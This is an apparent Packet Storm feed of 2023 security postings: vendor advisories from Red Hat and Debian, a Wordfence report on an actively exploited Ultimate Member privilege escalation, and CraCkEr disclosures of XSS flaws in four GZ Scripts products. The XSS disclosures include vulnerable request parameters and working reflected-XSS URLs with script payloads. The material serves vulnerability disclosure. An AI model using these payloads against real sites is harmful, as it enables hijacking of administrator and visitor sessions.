Ticket Booking Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/ticket-booking-script.html                           ││  Vendor   : GZ Scripts                                                                 ││  Software : Ticket Booking Script 1.8                                                  ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /TicketBookingScript/load.php?controller=GzFront&action=booking_details&cid=all&layout=calendar&show_header=T&local=3 HTTP/1.1title=mr&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=wjrgvb&terms=1&ticket_id%5B%5D=532&event_id=3-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Event] for Booking - Select seats 2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)    XSS Will Fire and Executed on his Browser      [-] Done

Ticket Booking Script 1.8 Cross Site Scripting

Red Hat Security Advisory 2023-3936-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: python3 security update  
Advisory ID:       RHSA-2023:3936-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3936  
Issue date:        2023-06-29  
CVE Names:         CVE-2023-24329   
=====================================================================

1. Summary:

An update for python3 is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Python is an interpreted, interactive, object-oriented programming  
language, which includes modules, classes, exceptions, very high level  
dynamic data types and dynamic typing. Python supports interfaces to many  
system calls and libraries, as well as to various windowing systems.

Security Fix(es):

* python: urllib.parse url blocklisting bypass (CVE-2023-24329)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2173917 - CVE-2023-24329 python: urllib.parse url blocklisting bypass

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

aarch64:  
platform-python-debug-3.6.8-15.1.el8_1.1.aarch64.rpm  
platform-python-devel-3.6.8-15.1.el8_1.1.aarch64.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.aarch64.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.aarch64.rpm  
python3-idle-3.6.8-15.1.el8_1.1.aarch64.rpm  
python3-tkinter-3.6.8-15.1.el8_1.1.aarch64.rpm

ppc64le:  
platform-python-debug-3.6.8-15.1.el8_1.1.ppc64le.rpm  
platform-python-devel-3.6.8-15.1.el8_1.1.ppc64le.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.ppc64le.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.ppc64le.rpm  
python3-idle-3.6.8-15.1.el8_1.1.ppc64le.rpm  
python3-tkinter-3.6.8-15.1.el8_1.1.ppc64le.rpm

s390x:  
platform-python-debug-3.6.8-15.1.el8_1.1.s390x.rpm  
platform-python-devel-3.6.8-15.1.el8_1.1.s390x.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.s390x.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.s390x.rpm  
python3-idle-3.6.8-15.1.el8_1.1.s390x.rpm  
python3-tkinter-3.6.8-15.1.el8_1.1.s390x.rpm

x86_64:  
platform-python-3.6.8-15.1.el8_1.1.i686.rpm  
platform-python-debug-3.6.8-15.1.el8_1.1.i686.rpm  
platform-python-debug-3.6.8-15.1.el8_1.1.x86_64.rpm  
platform-python-devel-3.6.8-15.1.el8_1.1.i686.rpm  
platform-python-devel-3.6.8-15.1.el8_1.1.x86_64.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.i686.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.x86_64.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.i686.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.x86_64.rpm  
python3-idle-3.6.8-15.1.el8_1.1.i686.rpm  
python3-idle-3.6.8-15.1.el8_1.1.x86_64.rpm  
python3-test-3.6.8-15.1.el8_1.1.i686.rpm  
python3-tkinter-3.6.8-15.1.el8_1.1.i686.rpm  
python3-tkinter-3.6.8-15.1.el8_1.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
python3-3.6.8-15.1.el8_1.1.src.rpm

aarch64:  
platform-python-3.6.8-15.1.el8_1.1.aarch64.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.aarch64.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.aarch64.rpm  
python3-libs-3.6.8-15.1.el8_1.1.aarch64.rpm  
python3-test-3.6.8-15.1.el8_1.1.aarch64.rpm

ppc64le:  
platform-python-3.6.8-15.1.el8_1.1.ppc64le.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.ppc64le.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.ppc64le.rpm  
python3-libs-3.6.8-15.1.el8_1.1.ppc64le.rpm  
python3-test-3.6.8-15.1.el8_1.1.ppc64le.rpm

s390x:  
platform-python-3.6.8-15.1.el8_1.1.s390x.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.s390x.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.s390x.rpm  
python3-libs-3.6.8-15.1.el8_1.1.s390x.rpm  
python3-test-3.6.8-15.1.el8_1.1.s390x.rpm

x86_64:  
platform-python-3.6.8-15.1.el8_1.1.x86_64.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.i686.rpm  
python3-debuginfo-3.6.8-15.1.el8_1.1.x86_64.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.i686.rpm  
python3-debugsource-3.6.8-15.1.el8_1.1.x86_64.rpm  
python3-libs-3.6.8-15.1.el8_1.1.i686.rpm  
python3-libs-3.6.8-15.1.el8_1.1.x86_64.rpm  
python3-test-3.6.8-15.1.el8_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ2or9zjgjWX9erEAQgEGQ/+NF29rUsWpqKyPuuOWMqF0KJRjfd3sv1w  
6pp2p/7xR1rNrkJeMv2vU0Mv9n9xR7nVGnVEfkcxwDaUsrja0h/97yie8Z4FcXWI  
haTj5Oe83lKLxy4XomSiBIXRgp8svHCH5cPxe6p9Ezx9+xSg4QKW8Wz2T+Q7U13u  
ZeVaOeg/EIbJGa2+gQ1tUBb28xcnXavbGKbHNRUGLsgIPHF8tmXufTcPCM1GMPCr  
07NMfSJuwFt9CjlZXZIsfn2C1ADL+aRVMejvV/CY5Cn4cc6IJqX9nM2DpkiUgZjf  
+zjUrTXH/LGR7NOcyUyyWErJQJg9SoaJxWdyoUm9Pbs7YkF8QzN7UU0+2VIkdT5e  
dujPuFr435gaacj05xCWRgxAvck1Y6aYXaC8YJNM+KUyzZYcQyfGQB0RK9xHPorC  
eZjiqfii7qDEBJaDglX6fOHVwrQGrQ9sHSMToEBurlc+E6Wjvpsh45NcuLYOZubg  
TmShSgcEoLCN/K6NkAuo9L4SpWgmAU/IZW23nNpurWGrAI3Ht8FxRAgAQuieR4ic  
CW7OsFxx4/T/ZXKp/uXghRJBZHeP8nvY/0ymh11/DwQQ1lGGhxEVEx4jUjV1dbJO  
Alul8f5VjR7+eXYQsPWHZnx0dowuW/2NtBzzNxX83LgREzaf5U2HHY7AUy0jGe4X  
8U64p6Xx3FU=  
=muR1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3936-01

Red Hat Security Advisory 2023-3932-01 - Python is an interpreted, interactive, object-oriented programming language that supports modules, classes, exceptions, high-level dynamic data types, and dynamic typing. The python27 packages provide a stable release of Python 2.7 with a number of additional utilities and database connectors for MySQL and PostgreSQL. Issues addressed include a bypass vulnerability.

Red Hat Security Advisory 2023-3932-01

Sysdig Falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about Falco as a mix between snort, ossec and strace.

Falco 0.35.1

WordPress Ultimate Member plugin versions 2.6.6 and below suffer from a privilege escalation vulnerability.

    Description: Ultimate Member <= 2.6.6 – Privilege Escalation via Arbitrary User Meta Updates Affected Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership PluginPlugin Slug: ultimate-memberAffected Versions: <= 2.6.6CVE ID: CVE-2023-3460CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Unknown, Marc-Alexandre MontpasFully Patched Version: NONEThe Ultimate Member plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 2.6.6. This is due to the plugin using a predefined list of user meta keys that are banned which can be bypassed via a few method like adding slashes to the user meta key. This makes it possible for unauthenticated attackers to register on a site as an administrator.Vulnerable MechanismUltimate Member is a plugin designed to add easy registration and account management to WordPress sites. One of the features is a registration form that users can use to sign up for an account on a WordPress site running the plugin. Unfortunately, this form makes it possible for users to register and set arbitrary user meta values for their account.While the plugin has a preset defined list of banned keys, that a user should not be able to update, there are trivial ways to bypass filters put in place such as utilizing various cases, slashes, and character encoding in a supplied meta key value in vulnerable versions of the plugin.This makes it possible for attackers to set the wp_capabilities user meta value, which controls the user’s role on the site, to ‘administrator’. This grants the attacker complete access to the vulnerable site when successfully exploited.Indicators of CompromiseWhile our attack data is limited at this point, we do have the following indicators of compromise from a separate pre-existing firewall rule that provided partial coverage for this vulnerability. We recommend running a complete Wordfence malware scan to ensure your site is not compromised if you are running Ultimate Member, and keeping an eye out for the following indicators of compromise.- The most important thing to check for is new user accounts created with administrator privileges.- We are seeing the following usernames in our attack data:- wpenginer- wpadmins- wpengine_backup- se_brutal- segs_brutal- Access log entries showing attackers hitting a compromised site’s Ultimate Member registration page, which is set on the /register path by default.- Look for the following IP Addresses in a site’s access logs, or in the Wordfence plugin’s live traffic feed.- 146.70.189.245- 103.187.5.128- 103.30.11.160- 103.30.11.146- 172.70.147.176- The following domain has been associated with user account email addresses.- exelica[.]com- Check for plugins and themes that may not have been installed previously.If your site has been compromised by this exploit, we offer professional site cleaning services through Wordfence Care, with Wordfence Response providing an expedited turnaround time. Alternatively, if you’re comfortable with doing so we provide instructions on how to clean your site using the free Wordfence plugin.ConclusionIn today’s PSA, we covered a Critical-severity Privilege Escalation vulnerability in Ultimate Member that is being actively exploited. The vulnerability remains unpatched and can quickly allow unauthenticated users to automatically take over any site with the plugin installed. This means that all 200,000 installations are currently at risk. We recommend verifying that this plugin is not installed on your site until a patch is made available, and forwarding this advisory to anyone you know who manages a WordPress website.While the firewall rule we released today should protect Wordfence Premium, Wordfence Care, and Wordfence Response users from site takeover, the Ultimate Member plugin contains additional functionality that is impractical to block which could potentially be abused by a sophisticated attacker in combination with vulnerabilities in other software. As such we recommend uninstalling the plugin even if you are protected by our firewall rule, as it minimizes but does not fully eliminate the risk presented by this vulnerability.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.Special thank you to Ramuel Gall, Wordfence Senior Security Researcher, and István Márton, Wordfence Vulnerability Researcher, for their assistance reverse engineering this vulnerability and for contributing to this post!

WordPress Ultimate Member 2.6.6 Privilege Escalation

GZ Appointment Scheduling version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-gz-appointment-scheduling-script.html            ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Appointment Scheduling 1.8                                              ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /PHPGZAppointment/load.php?controller=GzFront&action=step5 HTTP/1.1service_id=1&employee_id=1&timeslot=1688119200&lang=3&date=2023-06-30&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=murimy&terms=1&lang=3-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Employee] & Select the Day and the Time2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php#!/GzAdmin/home/)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php#!/GzBooking/index/)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php#!/GzInvoice/index/)    XSS Will Fire and Executed on his Browser      [-] Done

GZ Appointment Scheduling 1.8 Cross Site Scripting

Debian Linux Security Advisory 5440-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5440-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 28, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-3420 CVE-2023-3421 CVE-2023-3422Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 114.0.5735.198-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 114.0.5735.198-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSceTMACgkQEMKTtsN8TjYsiA/+OWn1Ps1ARDZgEE82rN+QOLoo6/WWVGk+ZafRaHK1s3aoLC250A/kTEBQLtUgk8b8+xlcvB86GfNASakBwfbmZG9q1joXsTDzQsK9l1vsbtFIfiOgS2a1P3mZkFPCux+yLfFvKRwg9ofBphAY5CFgmzPjU4E0OHtDlwfie4CJsJ9PQuWprWZXmIo5W5p5/rpGCEZCK7VWlG6aocoSeScYGsfKl0ue8He990eZg4KuHbxsHzVMvuX+DtACFe2x3WdZKkyxaucHKD4WIawVh87zFAx0+Fnf1IXAkegyowDEy0D17zI4/Nab92JMAd2YLxnonMp+56ESLqU6AD+P16OWpMKpsFg0J20u/BqCcGsP9GtfsYev1MIJBVolm/ph7m4PgkcgwXXy0atGM2D0T9BqLTYEFm3MK2AA2yyUXIRw5QA0VwJk57cguOF+hFJrhwbhTvlKNthpQrrhhh2tRzIO1x+BT6NDMpBFyS2Y0x7+e8E4HdRwr3FTmf26sxfzRKhGHjM4gUwb2yKFLgwIjriZBgY2OC1gPHMod3oFHOKf0Ml/piRQRNXuJFUZCdMaZirdzCWE5BeNJX42wdWLDdpPFTf1TtEJuaX/AD59TOPa3p23mO4cqJTOehZ3u/EPOm3zRCjBT2GPKy911xO9sxoPsff2F1mW/ndQU6/ybeAjLBk==jLPG-----END PGP SIGNATURE-----

Debian Security Advisory 5440-1

Property Listing Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/property-listing-script.html                         ││  Vendor   : GZ Scripts                                                                 ││  Software : Property Listing Script 1.0                                                ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET 'page' parameter is vulnerable to RXSShttps://website/preview.php?&page=j5wno%22%3e%3cscript%3ealert(1)%3c%2fscript%3epjd8c&sort_by=ascpricePath: /preview.phpGET 'layout' parameter is vulnerable to RXSShttps://website/preview.php?layout=gridpv063%22%3e%3cscript%3ealert(1)%3c%2fscript%3eg46bcPath: /preview.phpGET 'sort_by' parameter is vulnerable to RXSShttps://website/preview.php?&page=1&sort_by=orbb0%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhv9a[-] Done

Property Listing Script 1.0 Cross Site Scripting

Car Listing Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/car-listing-script-php.html                          ││  Vendor   : GZ Scripts                                                                 ││  Software : Car Listing Script 1.8                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttp://website/preview.php/n42rk"><script>alert(1)</script>i2rgn?controller=GzFront&action=detail&car_id=10Path: /preview.phpGET 'page' parameter is vulnerable to RXSShttp://website/preview.php?&page=tdnzc%22%3e%3cscript%3ealert(1)%3c%2fscript%3eq4n0s&sort_by=old_listingPath: /preview.phpGET 'sort_by' parameter is vulnerable to RXSShttp://website/preview.php?&page=1&sort_by=bpei5%22%3e%3cscript%3ealert(1)%3c%2fscript%3erfgo3[-] Done

Car Listing Script 1.8 Cross Site Scripting

Red Hat Security Advisory 2023-3948-01 - The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Low: open-vm-tools security update  
Advisory ID:       RHSA-2023:3948-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3948  
Issue date:        2023-06-29  
CVE Names:         CVE-2023-20867   
=====================================================================

1. Summary:

An update for open-vm-tools is now available for Red Hat Enterprise Linux  
9.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, x86_64

3. Description:

The Open Virtual Machine Tools are the open source implementation of the  
VMware Tools. They are a set of guest operating system virtualization  
components that enhance performance and user experience of virtual  
machines.

Security Fix(es):

* open-vm-tools: authentication bypass vulnerability in the vgauth module  
(CVE-2023-20867)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2213087 - CVE-2023-20867 open-vm-tools: authentication bypass vulnerability in the vgauth module

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
open-vm-tools-12.1.5-1.el9_2.1.src.rpm

aarch64:  
open-vm-tools-12.1.5-1.el9_2.1.aarch64.rpm  
open-vm-tools-debuginfo-12.1.5-1.el9_2.1.aarch64.rpm  
open-vm-tools-debugsource-12.1.5-1.el9_2.1.aarch64.rpm  
open-vm-tools-desktop-12.1.5-1.el9_2.1.aarch64.rpm  
open-vm-tools-desktop-debuginfo-12.1.5-1.el9_2.1.aarch64.rpm  
open-vm-tools-sdmp-debuginfo-12.1.5-1.el9_2.1.aarch64.rpm  
open-vm-tools-test-12.1.5-1.el9_2.1.aarch64.rpm  
open-vm-tools-test-debuginfo-12.1.5-1.el9_2.1.aarch64.rpm

x86_64:  
open-vm-tools-12.1.5-1.el9_2.1.x86_64.rpm  
open-vm-tools-debuginfo-12.1.5-1.el9_2.1.x86_64.rpm  
open-vm-tools-debugsource-12.1.5-1.el9_2.1.x86_64.rpm  
open-vm-tools-desktop-12.1.5-1.el9_2.1.x86_64.rpm  
open-vm-tools-desktop-debuginfo-12.1.5-1.el9_2.1.x86_64.rpm  
open-vm-tools-salt-minion-12.1.5-1.el9_2.1.x86_64.rpm  
open-vm-tools-sdmp-12.1.5-1.el9_2.1.x86_64.rpm  
open-vm-tools-sdmp-debuginfo-12.1.5-1.el9_2.1.x86_64.rpm  
open-vm-tools-test-12.1.5-1.el9_2.1.x86_64.rpm  
open-vm-tools-test-debuginfo-12.1.5-1.el9_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-20867  
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ2of9zjgjWX9erEAQjZjw//RjyHb5TBQ8PKFI5RUsmniCGENc9FSQe2  
lmEWeUsBN1MXvB62o81VkQzXqikBNbRAvvX+uNuAMCEmbgWcpobrVj45kSw+zckT  
vTe3h58T7/dkftW32eb8U4ZbHn8yF2UxMHPAuzH4ejLxjjK86762re/fm4iPOYSu  
g5PHx1bHyOt318kRvEk4b9ZI5/aQAJXDNXplCbFiYt66iCkPxZOwxnzhiYncz6TP  
kz27ikiEHRaBwNcQEIRSGOpH/hQGYCB175gpz8/oxKzn5eO2htaQN8TnDX5RipDF  
bqIpW1VZB4hk+zKkpcGxt7VCTrb6CooRu21MaZ3Zpiskvn44eDtN+Bu1n8h8hppl  
KajNdylOBeOgf61HAuhaWL1lauXwks+MZPxCkt+/YKWgVhUtFfqamUVUqtJg8wnJ  
2xYuE6cfBwwF7xdYAQEtLzHPlyBEtF7grMUtPQNfyaE7VAxAx56rR8fzKeqh8aG8  
t6cx+LuMn/UoPxb94ZRNp2t6Wnx3gAf5LTmC54VoDaIH6jB4ccXea8VNtZPLzPYd  
8n1cSYwtT4IADDYj1APix+ihqWxWg5qXCL8zZE/iR1Jja9WI+58AmHCO130pc8Yo  
toOGpSvZScNvGsspYIyUwOzQ4cQfzx7p9E3pg80/nppRMCSOq6MG7RdTzroqxZSm  
m8FCwTysfe8=  
=tvNt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm